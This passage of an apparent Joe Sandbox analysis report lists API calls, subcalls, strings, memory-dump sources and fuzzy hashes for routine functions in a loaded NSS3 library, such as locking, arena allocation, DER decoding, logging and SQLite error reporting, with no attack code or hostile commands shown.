                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C499042
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C49905A
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C499073
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C4990EC
                                                                                                                                                                                                                                                        • Part of subcall function 6C460F00: PR_GetPageSize.NSS3(6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F1B
                                                                                                                                                                                                                                                        • Part of subcall function 6C460F00: PR_NewLogModule.NSS3(clock,6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F25
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C499111
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
                                                                                                                                                                                                                                                      • String ID: nXl
                                                                                                                                                                                                                                                      • API String ID: 2831689957-2538165799
                                                                                                                                                                                                                                                      • Opcode ID: c8e3a92b7501b32e93f93e3b073d089d6788a780e64dc8d56a4a4931f53d352c
                                                                                                                                                                                                                                                      • Instruction ID: b8925d8819e3b706d61aeec6b41e1ca8f1732d4138f28589eb0e175b0598854e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8e3a92b7501b32e93f93e3b073d089d6788a780e64dc8d56a4a4931f53d352c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD517A74A046248FDF00EF78C888E59BBF0BF4A318F065569DC499BB05EB31E885CB95
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C587CE0
                                                                                                                                                                                                                                                        • Part of subcall function 6C539BF0: TlsGetValue.KERNEL32(?,?,?,6C580A75), ref: 6C539C07
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C587D36
                                                                                                                                                                                                                                                      • PR_Realloc.NSS3(?,00000080), ref: 6C587D6D
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C587D8B
                                                                                                                                                                                                                                                      • PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6C587DC2
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C587DD8
                                                                                                                                                                                                                                                      • malloc.MOZGLUE(00000080), ref: 6C587DF8
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C587E06
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
                                                                                                                                                                                                                                                      • String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
                                                                                                                                                                                                                                                      • API String ID: 530461531-3274975309
                                                                                                                                                                                                                                                      • Opcode ID: d3050562fcd0ebb0cc78d85b1e7abb902b50b99e9c7d7125669b0829c451064f
                                                                                                                                                                                                                                                      • Instruction ID: f6354612a385c99da8c9a8ec2a00620b89f0394da6adc8833d0d5b9781249cd5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3050562fcd0ebb0cc78d85b1e7abb902b50b99e9c7d7125669b0829c451064f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4241C3B1A022119FDB04CF29CC80D6A37B6FF84358B29496CF81A8BB51D731ED01CBA1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C587E37
                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSPR_INHERIT_FDS), ref: 6C587E46
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: TlsGetValue.KERNEL32(00000040,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461267
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: EnterCriticalSection.KERNEL32(?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C46127C
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461291
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: PR_Unlock.NSS3(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C4612A0
                                                                                                                                                                                                                                                      • PR_sscanf.NSS3(00000001,%d:0x%lx,?,?), ref: 6C587EAF
                                                                                                                                                                                                                                                      • PR_ImportFile.NSS3(?), ref: 6C587ECF
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C587ED6
                                                                                                                                                                                                                                                      • PR_ImportTCPSocket.NSS3(?), ref: 6C587F01
                                                                                                                                                                                                                                                      • PR_ImportUDPSocket.NSS3(?,?), ref: 6C587F0B
                                                                                                                                                                                                                                                      • PR_ImportPipe.NSS3(?,?,?), ref: 6C587F15
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Import$Socket$CriticalCurrentEnterFilePipeR_sscanfSectionSecureThreadUnlockValuegetenvstrlen
                                                                                                                                                                                                                                                      • String ID: %d:0x%lx$NSPR_INHERIT_FDS
                                                                                                                                                                                                                                                      • API String ID: 2743735569-629032437
                                                                                                                                                                                                                                                      • Opcode ID: eda0c8cf40778648ae3510c23005af5d62f38d23fcf83ccc6233bd39a0db5c4b
                                                                                                                                                                                                                                                      • Instruction ID: dfebf59d2f48e88393d07e76bbcf7c94d7337ba7d5f12e8ba59f03f43e99b080
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eda0c8cf40778648ae3510c23005af5d62f38d23fcf83ccc6233bd39a0db5c4b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF31E171B05125DBEB00DF79CC40AABBBA9AB46388F200965F855A7B11E7719D04CBA2
APIs
• TlsGetValue.KERNEL32 ref: 6C494E90
• EnterCriticalSection.KERNEL32 ref: 6C494EA9
• TlsGetValue.KERNEL32 ref: 6C494EC6
• EnterCriticalSection.KERNEL32 ref: 6C494EDF
• PL_HashTableLookup.NSS3 ref: 6C494EF8
• PR_Unlock.NSS3 ref: 6C494F05
• PR_Now.NSS3 ref: 6C494F13
• PR_Unlock.NSS3 ref: 6C494F3A
  • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
  • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
  • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
  • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
  • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
  • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
  • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
  • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
  • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
Strings
Memory Dump Source
• Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
Similarity
• API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
• String ID: bUIl$bUIl
• API String ID: 326028414-2371435661
• Opcode ID: 5f020c839b3cd148a8f486f4a7314b6f3f6f527f1a39d38ae659126b4dae4c24
• Instruction ID: c9f606869b076449055570b3088209b3e66325b79e15129eac9c0d28ceb60624
• Opcode Fuzzy Hash: 5f020c839b3cd148a8f486f4a7314b6f3f6f527f1a39d38ae659126b4dae4c24
• Instruction Fuzzy Hash: E9412BB4A04A15DFCB00EF68C48496ABBF0FF49354B028669EC599B714EB30E855CBD5
APIs
• PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C4BDE64), ref: 6C4BED0C
• SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4BED22
  • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
• PL_FreeArenaPool.NSS3(?), ref: 6C4BED4A
• PL_FinishArenaPool.NSS3(?), ref: 6C4BED6B
• PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C4BED38
  • Part of subcall function 6C3F4C70: TlsGetValue.KERNEL32(?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4C97
  • Part of subcall function 6C3F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CB0
  • Part of subcall function 6C3F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CC9
• SECOID_FindOID_Util.NSS3(?), ref: 6C4BED52
• PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C4BED83
• PL_FreeArenaPool.NSS3(?), ref: 6C4BED95
• PL_FinishArenaPool.NSS3(?), ref: 6C4BED9D
  • Part of subcall function 6C4D64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C4D127C,00000000,00000000,00000000), ref: 6C4D650E
Strings
Memory Dump Source
• Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
Similarity
• API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
• String ID: security
• API String ID: 3323615905-3315324353
• Opcode ID: 702465069a302d6b785187ece1a1d88381492bf7c3609bc2c5d1d9b35f99302f
• Instruction ID: cc12123f169d1b21b0e0e741964f01e7a9e5db5589837a6bfbec65452a74df62
• Opcode Fuzzy Hash: 702465069a302d6b785187ece1a1d88381492bf7c3609bc2c5d1d9b35f99302f
• Instruction Fuzzy Hash: 85118B7590020667D700E625AC90FBB727CEF8120DF020868E801B2F40F7B4B50D86EB
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_LogPrint.NSS3(Aborting,?,6C462357), ref: 6C580EB8
                                                                                                                                                                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C462357), ref: 6C580EC0
                                                                                                                                                                                                                                                      • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C580EE6
                                                                                                                                                                                                                                                        • Part of subcall function 6C5809D0: PR_Now.NSS3 ref: 6C580A22
                                                                                                                                                                                                                                                        • Part of subcall function 6C5809D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C580A35
                                                                                                                                                                                                                                                        • Part of subcall function 6C5809D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C580A66
                                                                                                                                                                                                                                                        • Part of subcall function 6C5809D0: PR_GetCurrentThread.NSS3 ref: 6C580A70
                                                                                                                                                                                                                                                        • Part of subcall function 6C5809D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C580A9D
                                                                                                                                                                                                                                                        • Part of subcall function 6C5809D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C580AC8
                                                                                                                                                                                                                                                        • Part of subcall function 6C5809D0: PR_vsmprintf.NSS3(?,?), ref: 6C580AE8
                                                                                                                                                                                                                                                        • Part of subcall function 6C5809D0: EnterCriticalSection.KERNEL32(?), ref: 6C580B19
                                                                                                                                                                                                                                                        • Part of subcall function 6C5809D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C580B48
                                                                                                                                                                                                                                                        • Part of subcall function 6C5809D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C580C76
                                                                                                                                                                                                                                                        • Part of subcall function 6C5809D0: PR_LogFlush.NSS3 ref: 6C580C7E
                                                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C580EFA
                                                                                                                                                                                                                                                        • Part of subcall function 6C46AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C46AF0E
                                                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F16
                                                                                                                                                                                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F1C
                                                                                                                                                                                                                                                      • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F25
                                                                                                                                                                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F2B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
                                                                                                                                                                                                                                                      • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                                                                                                                      • API String ID: 3905088656-1374795319
                                                                                                                                                                                                                                                      • Opcode ID: 4648f7d73904939644803dd163787ecd8ef827bec4fb0555afde69342f883115
                                                                                                                                                                                                                                                      • Instruction ID: 0e80c764fd66bfc401cedd6e8ac79370ce27e7d9d3b2f617fb10b589658872d3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4648f7d73904939644803dd163787ecd8ef827bec4fb0555afde69342f883115
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0F0AFB99001547BDA007BA1DC4ACAB3E2DEF82368F044028FD0956A02DB36FA5596F6
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000400), ref: 6C4E4DCB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C4E4DE1
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C4E4DFF
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C4E4E59
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFAB0: free.MOZGLUE(?,-00000001,?,?,6C46F673,00000000,00000000), ref: 6C4CFAC7
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C5A300C,00000000), ref: 6C4E4EB8
                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(?), ref: 6C4E4EFF
                                                                                                                                                                                                                                                      • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C4E4F56
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C4E521A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1025791883-0
                                                                                                                                                                                                                                                      • Opcode ID: 59f1729dfe0e17cb81884145c6c4aec1845ee575a68e2ac7cdaa57ebf7118773
                                                                                                                                                                                                                                                      • Instruction ID: 7200ed4900cee7a8e74846b1faff37a26b5a6ccb87e9782ba7ef5fd523b6a65f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 59f1729dfe0e17cb81884145c6c4aec1845ee575a68e2ac7cdaa57ebf7118773
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10F17D71E01205CBDB04CF98D840FADB7B2BF4835AF264169E915AB781E775E982CB90
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(00000001,00000000,6C5C0148,?,6C486FEC), ref: 6C47502A
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(00000001,00000000,6C5C0148,?,6C486FEC), ref: 6C475034
                                                                                                                                                                                                                                                      • PL_NewHashTable.NSS3(00000000,6C4CFE80,6C4CFD30,6C51C350,00000000,00000000,00000001,00000000,6C5C0148,?,6C486FEC), ref: 6C475055
                                                                                                                                                                                                                                                      • PL_NewHashTable.NSS3(00000000,6C4CFE80,6C4CFD30,6C51C350,00000000,00000000,?,00000001,00000000,6C5C0148,?,6C486FEC), ref: 6C47506D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: HashLockTable
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3862423791-0
                                                                                                                                                                                                                                                      • Opcode ID: 974718ba33bc2a20290f0915e30813f6a53181eed7de37258dc2fcaf703c0293
                                                                                                                                                                                                                                                      • Instruction ID: 73ab1c6ff0f2d7e4d38279a6e550a56e3a93f3f21e444921036baac238e563c4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 974718ba33bc2a20290f0915e30813f6a53181eed7de37258dc2fcaf703c0293
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A731A6B1B053609BEB20DAA58D4CF9737B8EB52349F028114E9158B740D375AD84CBFE
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C412F3D
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,?), ref: 6C412FB9
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,00000000,?), ref: 6C413005
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C4130EE
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C413131
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001086C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C413178
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: memcpy$memsetsqlite3_log
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 984749767-598938438
                                                                                                                                                                                                                                                      • Opcode ID: a3f07f5b6ecbbaa28719806c8c9184ede37f48051e130f5c7c3ae89d4990c854
                                                                                                                                                                                                                                                      • Instruction ID: c7d30e0cb2cf7eb595d905bebda3ed1aae99f0febba214f37d17eb6b744dc29f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3f07f5b6ecbbaa28719806c8c9184ede37f48051e130f5c7c3ae89d4990c854
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5AB192B0E092199BCB18CF9DC884EFEBBB1BF49314F144429E485B7B45D774A942CBA4
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __allrem
                                                                                                                                                                                                                                                      • String ID: @Xl$PXl$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2$Xl
                                                                                                                                                                                                                                                      • API String ID: 2933888876-3624889994
                                                                                                                                                                                                                                                      • Opcode ID: a6552c5c93684acc6b4352eac8ec18c764147572bfc126864bb6c749cdd150ae
                                                                                                                                                                                                                                                      • Instruction ID: 97c06139c3bc32fb90f5802c877801aede76286e4dfe9e5860c780b6b7afe8c0
